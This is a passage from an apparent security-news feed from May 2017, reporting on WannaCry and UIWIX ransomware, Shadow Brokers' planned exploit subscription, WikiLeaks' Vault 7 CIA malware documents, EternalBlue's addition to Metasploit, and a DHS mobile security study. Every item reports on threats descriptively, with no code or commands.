Number of targeted file types 176 All files in the affected system except those in its exclusion list
Shadow copies deletion Yes No
Languages supported (ransom notes, payment site) Multilingual (27) English only
UIWIX malware

Another interesting behavior observed by the researchers is that the malware terminates itself if the compromised computer is located in Russia, Kazakhstan, and Belarus.

The network activity of the malware leverages mini-tor.dll to connect to .onion site, meanwhile, WannaCry was scanning the Internet for random IP addresses to check if it has an open port 445 and it was connecting to .onion site using the Tor browser.

Most evident differences between WannaCry and UIWIX are:

UIWIX doesn’t implement the worm spreading capabilities;
UIWIX doesn’t include a kill-switch;
UIWIX uses a different Bitcoin address for each victim;
Clearly, the WannaCry attack represents a great opportunity for cyber crime ecosystem, every time a new flaw was discovered cooks try to exploit is in the attack in the wild, for example including the exploit code in crimeware kits used in hacking campaigns.

Recently we reported the case of the Adylkuzz botnet, another malware that exploited the EternalBlue exploit to spread a Monero miner.

“It’s not a surprise that WannaCry’s massive impact turned the attention of other cybercriminals into using the same attack surface vulnerable systems and networks are exposed to. Apart from WannaCry and UIWIX, our sensors also detected a Trojan delivered using EternalBlue—Adylkuzz (TROJ_COINMINER.WN). This malware turns infected systems into zombies and steals its resources in order to mine for the cryptocurrency Monero.” Trend Micro concludes.

“UIWIX, like many other threats that exploit security gaps, is a lesson on the real-life significance of patching.”


WikiLeaks revealed CIA Athena Spyware, the malware that targets all Windows versions
20.5.2017 securityaffairs BigBrothers

Wikileaks released the documentation for the Athena Spyware, a malware that could infect and remote control almost any Windows machine.
Last Friday, Wikileaks released the documentation for AfterMidnight and Assassin malware platforms, today the organization leaked a new batch of the CIA Vault 7 dump that includes the documentation related to a spyware framework dubbed Dubbed Athena /Hera.

The batch of CIA files includes a user manual of the Athena platform, an overview of the technology, and a demo on how to use the malware.

Reading the documents it is possible to discover that any Windows systems could be infected by the two spyware, Athena works for XP through Windows 10 and Hera for Windows 8 through Windows 10.

The Athena / Hera malware were used by the CIA to take remote control over the infected Windows machines remotely.
“The Athena System fulfills COG/NOD’s need for a remote beacon/loader. Table 2 shows the system components available in Athena/Hera v1.0. The target computer operating systems are Windows XP Pro SP3 32-bit (Athena only), Windows 7 32-bit/64-bit, Windows 8.1 32- bit/64-bit, Windows 2008 Enterprise Server, Windows 2012 Server, and Windows 10.” reads the system overview included in the user guide. “Ubuntu v14.04 is the validated Linux version. Apache 2.4 is the validated web server for the Listening Post.”

The Athena spyware was written in Python, is seems to be dated back August 2015, if confirmed it is worrying news because Microsoft released Windows 10 in July 2015.

Athena is the result of a joint work of CIA developers and peers at cyber security firm Siege Technologies that is specialized in offensive cyber security.

“Athena is a beacon loader developed with Siege Technologies. At the core it is a very simple implant application. It runs in user space and beacons from the srvhost process. The following diagram shows the concept of operation.” states the Athena Technology Overview.

CIA Athena spyware

The documents leaked by Wikileaks reveals that ability of the Athena spyware to modify its configuration in real time, customizing it to a specific operation.

“Once installed, the malware provides a beaconing capability (including configuration and task handling), the memory loading/unloading of malicious payloads for specific tasks and the delivery and retrieval of files to/from a specified directory on the target system,” WikiLeaks claims.

However, WikiLeaks has not provided any detail about the operations being conducted by the agency using Athena, but it is not hard to imagine how the intelligence agency would be using this program to spy on their targets.

Below the list of the mail dumps leaked by WikiLeaks:

The Year Zero that revealed CIA hacking exploits for hardware and software.
Weeping Angel spying tool to hack Samsung smart TV and use them as
The Dark Matter dump is containing iPhone and Mac hacking exploits.
The Marble batch focused on a framework used by the CIA to make hard the attribution of cyber attacks.
The Grasshopper batch that reveals a framework to customize malware for breaking into Microsoft’s Windows and bypassing antivirus protection.
The Scribbles Project for document tracking.
Archimedes man-in-the-middle (MitM) attack tool.
AfterMidnight and Assassin malware platforms.


Shadow Brokers Promise More Exploits for Monthly Fee

18.5.2017 securityweek BigBrothers
The hacker group calling itself Shadow Brokers claims to possess even more exploits stolen from the NSA-linked Equation Group, and anyone can have them by paying a monthly “membership” fee.

The Shadow Brokers have been in the news over the past days after unknown threat actors leveraged two of the exploits they leaked to deliver WannaCry ransomware to hundreds of thousands of systems worldwide.

The attackers have used an exploit called EternalBlue, which leverages an SMB vulnerability in Windows, to distribute the ransomware without user interaction. Microsoft patched the flaw in March and over the weekend it made available fixes even for outdated versions of Windows.

Some people blamed Shadow Brokers for the devastating WannaCry attacks, arguing that the ransomware could not have spread so easily without the exploits they leaked. Others believe the existence of the vulnerability would have come to light at some point even without them leaking the exploit.

The Shadow Brokers insist that their main goal is to make money and to demonstrate that they are a “worthy opponent” of the Equation Group.

The hackers claimed Microsoft postponed its February security updates to address the EternalBlue and other Eternal exploits. However, they pointed out that they had waited for 30 days after Microsoft rolled out the fixes before releasing the exploits.

The WannaCry attacks led to Microsoft president and chief legal officer Brad Smith renewing his call for governments to stop stockpiling vulnerabilities and disclose them to affected vendors.

Shadow Brokers, however, claims the NSA and Microsoft are “BFFs,” with contracts of “millions or billions of USD each year.” Their other conspiracy theories include an agreement between the NSA and Microsoft over not patching vulnerabilities until they are publicly disclosed, and Microsoft fixing the recent SMB flaw in secret after the NSA lied about the exploits it had been using.

Shadow Brokers claims to possess much more data and exploits, and in June the group plans on launching a subscription-based “service.”

According to the hackers, people willing to pay a monthly fee will receive exploits for browsers, routers, mobile devices, and Windows (including Windows 10). The offer also includes SWIFT network data and information on Russian, Chinese, Iranian and North Korean nuclear and missile programs.

Judging by the group’s previous offers to sell the data for thousands and even tens of thousands of bitcoins, the membership fee will likely not be small.

However, if someone offers to buy the remaining exploits and data from the Shadow Brokers, the group said it will go dark permanently as it will no longer have any financial incentive to continue taking risks.

In January, after failed attempts to make money via auctions, crowdfunding and direct sales, Shadow Brokers announced that it was retiring. With the renewed interest in the exploits it possesses, the group has apparently come up with yet another strategy for making a profit.


Shadow Brokers are back after WannaCry case, it plans to offer data dump on monthly subscription model
17.5.2017 securityaffairs BigBrothers

Shadow Brokers made the headlines once again, the notorious group plans to offer data dump on a monthly subscription model.
The notorious Shadow Brokers hacking group made the headlines during the weekend when systems worldwide were compromised by the WannaCry ransomware because the thread leveraged the EternalBlue exploit and DoublePulsar backdoor developed by the NSA.

Both tools were included in the huge trove of documents and exploits dumped by the Shadow Brokers last month after a failed attempt to auction off them.

The vulnerability exploited by the tools was fixed by Microsoft on March, but the company took the unusual decision of releasing patches for unsupported versions of its operating systems including Windows XP and Windows Server 2003.

Shadow Brokers decided to go out with a long message to netizens, the group criticized the US government and IT giants for the way have managed the exploits months before their public release.

Shadow Brokers

It references its posting of screenshots of Windows exploits from its haul, a development it credits for Microsoft’s release of an SMB (Server Message Block) patch in March, before attempting to justify its release of tools a month later in April, warning there was a lot more where that came from.

“In April, 90 days from the Equation Group show and tell, 30 days from Microsoft patch, theshadowbrokers dumps old Linux (auction file) and windows ops disks. Because why not? TheShadowBrokers is having many more where coming from? “75% of U.S. cyber arsenal” TheShadowBrokers dumped 2013 OddJob from ROCTOOLS and 2013 JEEPFLEAMARKET from /TARGETS.” states the Shadow Brokers’s message.

“In April, 90 days from theequationgroup show and tell, 30 days from Microsoft patch, theshadowbrokers dumps old Linux (auction file) and windows ops disks. Because why not? TheShadowBrokers is having many more where coming from? “75% of U.S. cyber arsenal”.TheShadowBrokers dumped 2013 OddJob from ROCTOOLS and 2013 JEEPFLEAMARKET from /TARGETS. This is theshadowbrokers way of telling theequationgroup “all your bases are belong to us”. TheShadowBrokers is not being interested in stealing grandmothers’ retirement money. This is always being about theshadowbrokers vs theequationgroup.”

According to the Shadow Brokers, the NSA-linked EquationGroup has clearly infiltrated tech giants, including Microsoft. The hacking group says it plans to sell off new exploits every month from June onwards. Windows 10, web browser and router exploits along with “compromised network data from more SWIFT providers and Central banks” are among the items that might be offered through the “dump of the month” service.

The hacking crews announce it plans to sell off new exploits every month starting from June, a data dump based on a monthly subscription model.

The group claims to have exploit codes for almost any technology available on the market, including “compromised network data from more SWIFT providers and Central banks.”

TheShadowBrokers Monthly Data Dump could be being:

web browser, router, handset exploits and tools
select items from newer Ops Disks, including newer exploits for Windows 10
compromised network data from more SWIFT providers and Central banks
compromised network data from Russian, Chinese, Iranian, or North Korean nukes and missile programs
“In June, TheShadowBrokers is announcing “TheShadowBrokers Data Dump of the Month” service. TheShadowBrokers is launching new monthly subscription model. Is being like wine of month club. Each month peoples can be paying membership fee, then getting members only data dump each month. What members doing with data after is up to members.” continues the group’s message.

Experts believe the Shadow Brokers team would shut down operations permanently and is looking for a “responsible party is buying all lost data before it is being sold.”


World Close to 'Serious Digital Sabotage': Dutch Spy Chief

17.5.2017 securityweek BigBrothers
The world may be close to a "serious act of digital sabotage" which could trigger unrest, "chaos and disorder," Dutch spy chief Rob Bertholee warned Tuesday.

Sabotage of critical infrastructure "is the kind of thing that might keep you awake at night," Bertholee told a timely cyber security conference in The Hague, as global experts grapple with the fallout of a massive cyberattack over the past days.

Digital threats "are not imaginary, they are everywhere around us," the head of the country's intelligence services (AIVD) told the conference organised by the Dutch government.

"In my opinion, we might be closer to a serious act of digital sabotage than a lot of people can imagine," he told hundreds of experts and officials.

Bertholee highlighted how in 2012 the computers at Saudi Arabia's largest oil company came under brief attack, or how three years later Ukrainian electricity companies were hacked causing a massive blackout lasting several hours.

The world's infrastructure was heavily interconnected, which had huge benefits, but also "vulnerabilities".

"Imagine what would happen if the entire banking system were sabotaged for a day, two days, for a week," he asked.

"Or if there was a breakdown in our transportation network. Or if air traffic controllers faced cyberattacks while directing flights. The consequences could be catastrophic."

Added Bertholee: "Sabotage on one of these sectors could have major public repercussions, causing unrest, chaos and disorder."

The threat of "cyber terrorism" from terror groups such as the so-called Islamic State jihadist and Al-Qaeda was still limited, he said, but "jihadist-inspired terrorism is the number one priority" of the Dutch intelligence services.

"The level of technical expertise available to a jihadist group is still insufficient to inflict significant damage or personal injury through digital sabotage," Bertholee said.

"They may not yet have the capability but they definitely have the intent," he warned.

Countries must be prepared for future threats in the digital domain, with governments and private sector working closely together, as this is "where our societies have become most vulnerable," he said.

Security researchers investigating the massive cyberattack campaign over past days on Tuesday reported signs that it might be slowing, and suggested a possible North Korean link.

In the first clues of the origin of the massive ransomware attacks, Google researcher Neel Mehta posted computer code that showed similarities between the "WannaCry" malware and a vast hacking effort widely attributed to Pyongyang.

Europol meanwhile said the number of affected IP addresses around the world was 163,745 -- a 38 percent percent fall from the 226,000 reported on Sunday.


Shadow Brokers Promise More Exploits for Monthly Fee

17.5.2017 securityweek BigBrothers
The hacker group calling itself Shadow Brokers claims to possess even more exploits stolen from the NSA-linked Equation Group, and anyone can have them by paying a monthly “membership” fee.

The Shadow Brokers have been in the news over the past days after unknown threat actors leveraged two of the exploits they leaked to deliver WannaCry ransomware to hundreds of thousands of systems worldwide.

The attackers have used an exploit called EternalBlue, which leverages an SMB vulnerability in Windows, to distribute the ransomware without user interaction. Microsoft patched the flaw in March and over the weekend it made available fixes even for outdated versions of Windows.

Some people blamed Shadow Brokers for the devastating WannaCry attacks, arguing that the ransomware could not have spread so easily without the exploits they leaked. Others believe the existence of the vulnerability would have come to light at some point even without them leaking the exploit.

The Shadow Brokers insist that their main goal is to make money and to demonstrate that they are a “worthy opponent” of the Equation Group.

The hackers claimed Microsoft postponed its February security updates to address the EternalBlue and other Eternal exploits. However, they pointed out that they had waited for 30 days after Microsoft rolled out the fixes before releasing the exploits.

The WannaCry attacks led to Microsoft president and chief legal officer Brad Smith renewing his call for governments to stop stockpiling vulnerabilities and disclose them to affected vendors.

Shadow Brokers, however, claims the NSA and Microsoft are “BFFs,” with contracts of “millions or billions of USD each year.” Their other conspiracy theories include an agreement between the NSA and Microsoft over not patching vulnerabilities until they are publicly disclosed, and Microsoft fixing the recent SMB flaw in secret after the NSA lied about the exploits it had been using.

Shadow Brokers claims to possess much more data and exploits, and in June the group plans on launching a subscription-based “service.”

According to the hackers, people willing to pay a monthly fee will receive exploits for browsers, routers, mobile devices, and Windows (including Windows 10). The offer also includes SWIFT network data and information on Russian, Chinese, Iranian and North Korean nuclear and missile programs.

Judging by the group’s previous offers to sell the data for thousands and even tens of thousands of bitcoins, the membership fee will likely not be small.

However, if someone offers to buy the remaining exploits and data from the Shadow Brokers, the group said it will go dark permanently as it will no longer have any financial incentive to continue taking risks.

In January, after failed attempts to make money via auctions, crowdfunding and direct sales, Shadow Brokers announced that it was retiring. With the renewed interest in the exploits it possesses, the group has apparently come up with yet another strategy for making a profit.


NSA's EternalBlue Exploit Fully Ported to Metasploit

17.5.2017 securityweek BigBrothers
The National Security Agency (NSA)-linked EternalBlue exploit that became well known after being used in a recent global ransomware campaign has been ported to the popular Metasploit penetration testing Framework.

Along with DoublePulsar, EternalBlue is one of the latest exploits publicly released by the hackers calling themselves “The Shadow Brokers” and is said to have been used by the NSA-linked Equation Group to launch cyber-attacks. When EternalBlue was made public, however, the flaw had been already addressed by Microsoft in their March security patches.

Abusing a vulnerability in Windows’ Server Message Block (SMB) on port 445, EternalBlue allowed the WannaCry ransomware to spread like a worm and hit over 200,000 machines within a few days only. Before WannaCry, however, a crypto-currency mining botnet dubbed Adylkuzz had been using the same exploit to compromise devices.

Researchers currently estimate there to be roughly one million computers Internet-acessible systems vulnerable to EternalBlue, but chances are that many more existed only a couple of days ago. Not only did Microsoft issue an emergency patch to protect older systems over the weekend, but the Adylkuzz botnet also blocks access to SMB after infection, to prevent other malware from exploiting the vulnerability.

Because malicious actors are already using EternalBlue in live attacks, researchers decided to add the exploit to the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. The framework is a sub-project of the penetration testing project Metasploit, which is a collaboration of the open source community and Rapid7.

The vulnerability exploited by EternalBlue is in SMBv1, but the exploit uses SMBv2 for the shellcode, one of the researchers behind the port, who goes by the online handle of zerosum0x0, explains. The penetration tester also notes that the code is still a little rough, but that more work will be done to it.

“The genie is already out of the bottle with EternalBlue. Let's keep in mind it's probably easier to rebundle the EternalBlue.exe than it is to pull in Ruby and Metasploit. Also, the original exploit still targets more versions. Just patch your systems people, it really isn't that hard. White hats need this exploit (instead of sketchy NSA malware) to show its impact to clients,” the researcher says.

The researchers also notes that FuzzBunch (NSA’s exploitation framework similar to Metasploit) makes the attack point and click, and that cybercriminals already have worms abusing it. The addition of EternalBlue to Metasploit should prove of great help to the infosec community, zerosum0x0 explains.

“I look at it this way, attackers and defenders are in an asymmetric war. If study is not done to the tools that are available to attackers, it is impossible to defend against them,” the researcher says.

Catalin Cosoi, Chief Security Strategist at Bitdefender, already expressed fears that EternalBlue-powered ransomware is bound to become the norm. Because many organizations failed to patch their systems in a timely manner, “it was only a matter of time until a cybercriminal group would weaponize the leaked vulnerability and strike at unpatched Windows systems,” he said.

“Computers in public institutions, hospitals and other care facilities are usually rarely updated. If they are not hit by ransomware now, these computers are vulnerable for state sponsored attacks for as long as they remain unpatched. Ransomware is the best case scenario now, because it’s visible. But complex threats can be built on it, to stay persistent and infiltrate organizations for a very long time,” Cosoi added.

One major difference between the Metasploit port of EternalBlue and the recent WannaCry and Adylkuzz attacks is the use of DoublePulsar. Instead of the NSA backdoor, the open source project stages Meterpreter userland payloads directly from the kernel through a queued APC. A shellcode that uses a similar technique as DoublePulsar's DLL injection is used, but is much smaller in size (up to 1000 bytes, depending on options enabled, compared to the 5000 bytes the NSA code has).

“This exploit also demonstrates what is important in the exploit for IDS/IPS/firewall rule makers. By finding out everything that can be nulled out, it evades many rules which were not fully considered, however those vendors can now add proper rules before an "0-day" worm version of it comes out,” zerosum0x0 points out.


Shadow Brokers, Who Leaked WannaCry SMB Exploit, Are Back With More 0-Days
16.5.2017 thehackernews BigBrothers
The infamous hacking collective Shadow Brokers – the one who leaked the Windows SMB exploit in public that led to last weekend's WannaCrypt menace – are back, this time, to cause more damage.
In typically broken English, the Shadow Brokers published a fresh statement (with full of frustration) a few hours ago, promising to release more zero-day bugs and exploits for various desktop and mobile platforms starting from June 2017.
However, this time the Shadow Brokers leaks will not be available for everybody, as the hacking collective said:
"TheShadowBrokers is launching new monthly subscription model. Is being like [the] wine of month club. Each month peoples can be paying membership fee, then getting members only data dump each month."
Get Ready for the 'Wine of Month Club'
So, anyone buying the membership of the "wine of month club" would be able to get exclusive access to the upcoming leaks, which the Shadow Brokers claims would include:
Exploits for web browsers, routers, and smartphones.
Exploits for operating systems, including Windows 10.
Compromised data from banks and Swift providers.
Stolen network information from Russian, Chinese, Iranian, and North Korean nuclear missile programs.
The claims made by the group remain unverified at the time of writing, but since the Shadow Brokers' previously released data dump turned out to be legitimate, the group's statement should be taken seriously, at least now, when we know the EternalBlue exploit and DoublePulsar backdoor developed by the NSA and released by the Shadow Brokers last month was used by WannaCry to cause chaos worldwide.
Before publicly dumping these exploits in April, the Shadow Brokers put an auction of cyber weapons stolen from NSA’s elite hacking team called Equation Group for 1 Million Bitcoin.
After failed auction, the hacking group even put up those hacking tools and exploits for direct sale on an underground site, categorizing them into a type — like "exploits," "Trojans," and "implant" — each of which ranged from 1 to 100 Bitcoins (from $780 to $78,000).
After failure from all sides, the group started leaking those hacking exploits. Last month, the Shadow Brokers released a Microsoft Windows SMB exploit that was used by the WannaCry ransomware, which infected 200,000 machines in 150 countries within just 48 hours.
While talking about the WannaCry ties with North Korean state-sponsored hacking group Lazarus Group, the group said:
"The Oracle is telling theshadowbrokers North Korea is being responsible for the global cyber attack Wanna Cry. Nukes and cyber attacks, America has to go to war, no other choices!"
Shadow Brokers Lashed out on US Government and Tech Companies
In its recent post, the Shadow Brokers criticized both the US government and tech companies, such as Microsoft, for not cracking down on the exploits when they had the chance, months before their release.
The hacking group said the US government is paying tech companies not to patch zero-days in their products, claiming that it has spies inside Microsoft among other US tech firms.
The Shadow Brokers even accused Google Project Zero team, saying:
"TheShadowBrokers is thinking Google Project Zero is having some former TheEquationGroup member. Project Zero recently releasing "Wormable Zero-Day" Microsoft patching in record time, knowing it was coming? Coincidence?"
Who knows if these accusation made by the Shadow Brokers group are true or not, but the world should be well prepared for another WannaCry-like massive destroyer.


WikiLeaks Details More Windows Attack Tools Used by CIA

15.5.2017 securityweek BigBrothers
WikiLeaks has published another round of documents describing tools allegedly used by the U.S. Central Intelligence Agency (CIA). The latest dump in the “Vault 7” series details two Windows frameworks named “AfterMidnight” and “Assassin.”

AfterMidnight is described as a DLL that self-persists as a Windows service and provides secure execution for “Gremlins,” hidden payloads that allow attackers to subvert the functionality of targeted software, exfiltrate data, and provide internal services for other Gremlins.

The tool’s developers also provide a payload called “AlphaGremlin,” which can be used to schedule the execution of custom tasks on a compromised machine.

Assassin is a similar implant that allows attackers to execute various tasks on a hacked machine, such as downloading and running an executable, collecting task results, and deleting the executable. Both tools receive instructions from command and control (C&C) servers.

WikiLeaks has regularly published Vault 7 files since March 7, including documents describing tools that can be used for man-in-the-middle (MitM) attacks on the LAN, Samsung smart TV hacking tools, a framework used to make attribution and analysis of malware more difficult, and a platform designed for creating custom malware installers.

However, the organization has not published any actual exploits in an effort to prevent abuse. The recent WannaCry ransomware attacks, which rely on exploits allegedly developed by the NSA and leaked by the Shadow Brokers, have demonstrated that leaking exploits developed by intelligence agencies could have serious consequences.

WikiLeaks has offered to share exploit code with affected tech companies, but it appears they are not too keen to work with the whistleblower organization. On the other hand, based on the available information, many have determined that the vulnerabilities described in the Vault 7 files have already been patched in the latest versions of their products.

Cisco did find a critical vulnerability affecting hundreds of its switches in the Vault 7 leak. The company informed customers of the flaw back in March, but it only recently started releasing patches.

The tools leaked by Shadow Brokers have been linked to the Equation Group, which is believed to be run by the NSA. In the case of the Vault 7 files, researchers have tied them to a cyber espionage group tracked as “Longhorn” and “The Lamberts.”


WikiLeaks Reveals 'AfterMidnight' & 'Assassin' CIA Windows Malware Frameworks
15.5.2017 thehackernews BigBrothers

When the world was dealing with the threat of the self-spreading WannaCry ransomware, WikiLeaks released a new batch of CIA Vault 7 leaks, detailing two apparent CIA malware frameworks for the Microsoft Windows platform.
Dubbed "AfterMidnight" and "Assassin," both malware programs are designed to monitor and report back actions on the infected remote host computer running the Windows operating system and execute malicious actions specified by the CIA.
Since March, WikiLeaks has published hundreds of thousands of documents and secret hacking tools that the group claims came from the US Central Intelligence Agency (CIA).
This latest batch is the 8th release in the whistleblowing organization's 'Vault 7' series.
'AfterMidnight' Malware Framework
According to a statement from WikiLeaks, 'AfterMidnight' allows its operators to dynamically load and execute malicious payload on a target system.
The main controller of the malicious payload, disguised as a self-persisting Windows Dynamic-Link Library (DLL) file and executes "Gremlins" – small payloads that remain hidden on the target machine by subverting the functionality of targeted software, surveying the target, or providing services for other gremlins.
Once installed on a target machine, AfterMidnight uses an HTTPS-based Listening Post (LP) system called "Octopus" to check for any scheduled events. If found one, the malware framework downloads and stores all required components before loading all new gremlins in the memory.

According to a user guide provided in the latest leak, local storage related to AfterMidnight is encrypted with a key which is not stored on the target machine.
A special payload, called "AlphaGremlin," contains a custom script language which even allows operators to schedule custom tasks to be executed on the targeted system.
'Assassin' Malware Framework
Assassin is also similar to AfterMidnight and described as "an automated implant that provides a simple collection platform on remote computers running the Microsoft Windows operating system."
Once installed on the target computer, this tool runs the implant within a Windows service process, allowing the operators to perform malicious tasks on an infected machine, just like AfterMidnight.
Assassin consists of four subsystems: Implant, Builder, Command and Control, and Listening Post.
The 'Implant' provides the core logic and functionality of this tool on a target Windows machine, including communications and task execution. It is configured using the 'Builder' and deployed to a target computer via some undefined vector.
The 'Builder' configures Implant and 'Deployment Executables' before deployment and "provides a custom command line interface for setting the Implant configuration before generating the Implant," reads the tool's user guide.
The 'Command and Control' subsystem acts as an interface between the operator and the Listening Post (LP), while the LP allows the Assassin Implant to communicate with the command and control subsystem through a web server.
Last week, WikiLeaks dumped a man-in-the-middle (MitM) attack tool, called Archimedes, allegedly created by the CIA to target computers inside a Local Area Network (LAN).
This practice by the US intelligence agencies of holding vulnerabilities, rather than disclosing them to the affected vendors, wreaked havoc across the world in past 3 days, when the WannaCry ransomware hit computers in 150 countries by using an SMB flaw that the NSA discovered and held, but "The Shadow Brokers" subsequently leaked it over a month ago.
Microsoft Slams NSA For Its Role in 'WannaCry' Attack
Even Microsoft President Brad Smith condemned the US intelligence agency’s practice, saying that the "widespread damage" caused by WannaCry happened due to the NSA, CIA and other intelligence agencies for holding zero-day security vulnerabilities.
"This is an emerging pattern in 2017. We have seen vulnerabilities stored by the CIA show up on WikiLeaks, and now this vulnerability stolen from the NSA has affected customers around the world," Smith said.
Since March, the whistleblowing group has published 8 batches of "Vault 7" series, which includes the latest and last week leaks, along with the following batches:
Year Zero – dumped CIA hacking exploits for popular hardware and software.
Weeping Angel – spying tool used by the agency to infiltrate smart TV's, transforming them into covert microphones.
Dark Matter – focused on hacking exploits the agency designed to target iPhones and Macs.
Marble – revealed the source code of a secret anti-forensic framework, basically an obfuscator or a packer used by the CIA to hide the actual source of its malware.
Grasshopper – reveal a framework which allowed the agency to easily create custom malware for breaking into Microsoft's Windows and bypassing antivirus protection.
Scribbles – a piece of software allegedly designed to embed 'web beacons' into confidential documents, allowing the spying agency to track insiders and whistleblowers.


Mobile Ecosystem Vulnerable Despite Security Improvements: DHS

13.5.2017 securityweek  BigBrothers
Mobile security is improving, but unprotected communication paths leave the ecosystem vulnerable, according to recent report from the Department of Homeland Security (DHS) and the National Institute of Standards and Technology (NIST).

The study details five primary components of the mobile ecosystem (mobile device technology stack, mobile applications, mobile network protocols and services, physical access to the device, and enterprise mobile infrastructure), as well as the attack surface for each of them. The report provides Congress with a view of the mobile security threats government workers face, while noting that defenses must cover the entire threat surface, not only the categories these threats fall into.

According to DHS’ Study on Mobile Device Security (PDF), mobile operating system providers have made advances, mobile device management and enterprise mobility management systems offer scrutiny and security configuration management, and best practices guides issued both by NIST and private industry further improve the landscape. Despite that, communication paths that remain unprotected create vulnerabilities, and further new fifth generation network protocols require additional hardening, and research still needs to be done, the report says.

Mobile operating systems

Currently the most popular mobile operating system out there, Android is seeing improvements to its security patch lifecycle, courtesy of an “Android security patch level” indicator that Google has introduced several months back. Because security fixes are delivered monthly, users and enterprises can easily assess the security state of their devices simply by looking at the patch level.

Mobile SecurityGoogle is pushing patches quickly to Nexus and Pixel devices and multiple manufacturers have already committed to distributing these fixes in a timely manner, but most Android devices is use remain unpatched for long periods of time, the report notes. This was also the conclusion of a June 2016 report from Duo Security, which revealed that, while most Android devices were eligible to receive updates, only a very small percentage actually got them.

“These security architecture improvements across all the mainstream mobile and PC operating systems (Google’s Android and Apple’s iOS as well as Microsoft’s Windows and other operating systems) are to be encouraged and applauded because they increase resilience to attack and raise the level of difficulty and the cost for attackers to discover vulnerabilities and develop exploits. Nevertheless, sufficiently motivated parties will continue to find exploitable vulnerabilities in mobile operating systems and other lower-level device components,” the report reads.

Additionally, there’s the issue of zero-day vulnerabilities, which have large monetary values associated, and which could be used by advanced attackers against high-value targets where the investment is justified (the Pegasus iOS malware serves as a great example). Apple and Google offer significant monetary rewards to researchers who disclose such flaws, but large prizes such as Zerodium’s $1.5 million for an exploitable zero-day in Apple iOS might seem more appealing.

Devices with unlocked bootloaders are more exposed to attacks, the same as jailbroken or rooted devices, which represent a major issue when used within enterprise environments. Thus, enterprises should advise employees not to root or jailbreak their devices, and should also ensure that the latest available patches are installed on all devices, thus keeping them safe from publicly known security vulnerabilities.

Mobile applications

Most mobile applications are available to users via dedicated portals, such as the Apple App Store and Google Play (each with around two million apps), but third party stores also exist, and some of them are non-legitimate sources of applications. Furthermore, the reliability and security of applications distributed through these stores may vary, especially since the vetting process is more opaque or less robust when compared to that of the public stores of OS vendors.

Applications pose security risks because of vulnerabilities that could be exploited or because they have been created for malicious purposes. Some of the vulnerabilities could expose users to excessive risks, and these include: insecure network communication, insecure file permissions/unprotected location when storing files, sensitive information written to system log, web browser flaws, vulnerabilities in third-party libraries, and cryptographic vulnerabilities.

App provenience is important when considering defenses against apps with inherent vulnerabilities, especially when it comes to software used by the Federal Government (which includes apps commissioned or built specifically for internal or external use and commercially available apps). App developers should follow security best practices and use mobile application vetting tools, enterprises should deploy and maintain Enterprise Mobility Management/Mobile device management (EMM/MDM) tools, and threat intelligence should be used to understand the potential risks associated with apps installed on devices, the report notes.

Malicious or privacy-invasive applications, on the other hand, are often focused on exploiting vulnerabilities in the operating system. These include apps that gather privacy-sensitive information, eavesdropping apps, programs that exploit flaws in other apps or access to sensitive enterprise networks or data, ransomware, software meant to enable fraud, rooting/jailbreaking apps, programs that manipulate trusted apps, or exploit public mobile app stores.

Mobile networks

“Vulnerabilities in this element of the mobile ecosystem are the most difficult to remediate because they are an intrinsic part of the design and operation of live cellular networks. Attempts to fix or update deployed systems can lead to outages that can affect the entire country,” the report reads. “It is important to note that each generation and family of mobile networks is a unique implementation and is not forward or backward compatible.”

Evolved from GSM through UMTS, Long Term Evolution (LTE) represents the most recent generation of radios used in mobile phones and is significantly more advanced than previous standards. However, GSM is still in use and will continue to be at least for the next three years, and LTE inherits some of the GSM architectural weaknesses, which creates security risks for all users. To that, one can add the attack surface that Signaling System 7 (SS7) opens (recently abused to steal money from bank accounts).

Threats to consider at the network level include those related to SIM cards (theft, cloning, or stealing cryptographic keys), radio access networks (jamming or denial of service, physical attacks on base station infrastructure), LTE (downgrade attacks, eavesdropping, device and identity tracking, prevention of emergency phone calls, network level denial of service), backhaul networks (eavesdropping), core networks (attacks against SS7), and external networks.

Device physical access

Once an attacker has physical access to a device, they can potentially obtain data, access it, or modify it, depending on the configuration of the device. Many people don’t use a passcode, pattern, or Personal Identification Number (PIN) on their devices, which means their data is exposed if their devices are lost or stolen. Recently, the addition of fingerprint sensors on devices has encouraged users to add a screen lock passcode, which is required for enabling the sensor, the report notes.

While activation lock capabilities Apple and Google added to mobile devices prevent actors from factory resetting lost or stolen devices, other physical-based attack vectors do exist, such as USB attacks. Also possible are scenarios where the mobile device is used to spread malware when connected to a computer.

Mobile enterprise

“Mobile devices do bring new threats to enterprises and can be used to target enterprise systems. Mobile devices form a unique class of end user equipment that frequently moves inside and outside of enterprise networks. This movement means that mobile devices compromised elsewhere can be used as vectors to compromise other enterprise devices or even the enterprise,” the study notes.

Incidents where malware spread from Android devices to other systems are becoming more frequent. This happens when a user attempts to charge a compromised device through an available USB port although they shouldn’t. The recently discovered DressCode Android malware was observed attempting to infect enterprise networks through compromised mobile devices.

Attackers can target EMM – technologies that help IT admins to control and manage mobile data, mobile devices, and their connections with enterprise resources – to gain unauthorized access to the admin console, or can impersonate an EMM server, allowing them to track users, access all mobile devices, or install malware for further attacks.

Private mobile application stores that enterprises use to manage and distribute software face threats as well: “impersonation or unauthorized use of administrator credentials, app developer credentials, or distribution certificates. Bypass or subvert application security analysis or vetting techniques,” the report reads. This could allow attackers to distribute enterprise apps to third-parties, and modify apps or deploy malicious apps to facilitate further attacks.

Emerging threats

In addition to the above, the report identified a series of probable emerging threats, which fall into the following categories: Open Source Signals Intelligence; Advances in decryption of cellular network authentication and privacy standards in the public sector; Advances in “IMSI Catcher” capabilities; Increasingly sophisticated cybercrime and fraud targeting individuals and corporations; and Increasing use of broad spectrum jamming by citizens seeking privacy.

Focused on identifying gaps in current defenses that require further research or improvement, the report also delivers a framework to help identifying attacker tactics and techniques, and informs on areas where current mitigations can’t properly protect mobile devices. Further, the report analyzes emerging threats, lists mobile security best practices collected from NIST and other government and non-government organizations, and also points out weaknesses in SS7 and Diameter.

“Threats to the Government’s use of mobile devices are real and exist across all elements of the mobile ecosystem. This is evident from the threat assessment conducted for this study and documented in the previous sections. The corresponding analysis of available defenses shows that despite significant advances in addressing both deliberate and accidental threats to mobile security, gaps remain that will command additional effort by Government and industry to reduce the risk of using mobile technologies,” the report reads.


Trump's Intel Bosses Reiterate: Russia Meddled in Election

12.5.2017 securityweek BigBrothers
Six top US intelligence officials told Congress Thursday they agree with the conclusion that Russia acted to influence last year's election, countering President Donald Trump's assertions that the hacking remains an open question.

